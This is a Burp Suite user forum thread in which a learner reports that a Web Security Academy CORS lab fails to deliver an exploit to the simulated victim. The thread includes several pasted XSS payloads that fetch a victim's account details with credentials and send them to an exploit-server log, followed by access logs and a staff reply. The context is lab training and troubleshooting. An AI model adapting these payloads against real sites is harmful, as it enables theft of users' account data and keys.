Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Faulty lab: "CORS vulnerability with trusted insecure protocols"

suljov | Last updated: Oct 03, 2024 09:47PM UTC

Lab on the "CORS vulnerability with trusted insecure protocols" seems to now work. Payloads tested: <script> document.location="http://stock.0ab5000003e3eb4881d620bc006d0090.web-security-academy.net/?productId=1<script>var req = new XMLHttpRequest();req.onload = reqListener;req.open('get','https://0ab5000003e3eb4881d620bc006d0090.web-security-academy.net/accountDetails',true);req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a92003203eaeb3f81f81fd6010a0092.exploit-server.net/log?key='+this.responseText;}%3C/script>&storeId=1" </script> <script> document.location="http://stock.0ab5000003e3eb4881d620bc006d0090.web-security-academy.net/?productId=1<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ab5000003e3eb4881d620bc006d0090.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a92003203eaeb3f81f81fd6010a0092.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=2" </script> %3Cscript%3E%0A%20%20%20%20document.location%3D%22http%3A%2F%2Fstock.0ab5000003e3eb4881d620bc006d0090.web-security-academy.net%2F%3FproductId%3D1%3Cscript%3Evar%20req%20%3D%20new%20XMLHttpRequest()%3B%20req.onload%20%3D%20reqListener%3B%20req.open(%27get%27%2C%27https%3A%2F%2F0ab5000003e3eb4881d620bc006d0090.web-security-academy.net%2FaccountDetails%27%2Ctrue)%3B%20req.withCredentials%20%3D%20true%3Breq.send()%3Bfunction%20reqListener()%20%7Blocation%3D%27https%3A%2F%2Fexploit-0a92003203eaeb3f81f81fd6010a0092.exploit-server.net%2Flog%3Fkey%3D%27%252bthis.responseText%3B%20%7D%3B%3C%2Fscript%3E%26storeId%3D2%22%0A%3C%2Fscript%3E <script> document.location="http://stock.0ab5000003e3eb4881d620bc006d0090.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ab5000003e3eb4881d620bc006d0090.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a92003203eaeb3f81f81fd6010a0092.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script> if i go to "view exploit" i can see my own API and so on. but if i click in "Deliver exploit to victim" it dont work and seems to now even to go the link/url it is supposed to (exploit) etc. since i had to try the one used in the solution tab, its confirmed its on Portswiggers side. Pls take a look at this. after clicking "Deliver exploit to victim" multiple times: 217.210.148.8 2024-10-03 21:42:59 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:03 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:03 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:22 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:22 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:27 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:27 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:29 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:29 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:37 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:37 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:38 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:39 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:47 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:47 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:49 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:49 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:57 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 217.210.148.8 2024-10-03 21:43:57 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" this is not fun and i had other small problems with other labs which makes me kinda hesitant to take the exam since i dont know if the exam labs will be the same, meaning broken etc.

Ben, PortSwigger Agent | Last updated: Oct 04, 2024 07:13AM UTC

Hi, The logs that you have provided would suggest this is not the case but do you see the victim user visiting the page at any point when you do deliver the exploit and view the access logs?

suljov | Last updated: Oct 04, 2024 07:55AM UTC

no, looks like the victim never visit the link etc. get nog logs the victim visit the /exploit for what i can se. since the payload works on me/my user etc its something with the victim on the backend that is not working right. works on my user when im using firefox and on chrome. i waited til the lab reseted and did again and didnt work. i wait some more and try again and see. but for the moment it looks like the stuff on the backend for the victim dont fully work/do as it is intended to do..?

suljov | Last updated: Oct 04, 2024 08:06AM UTC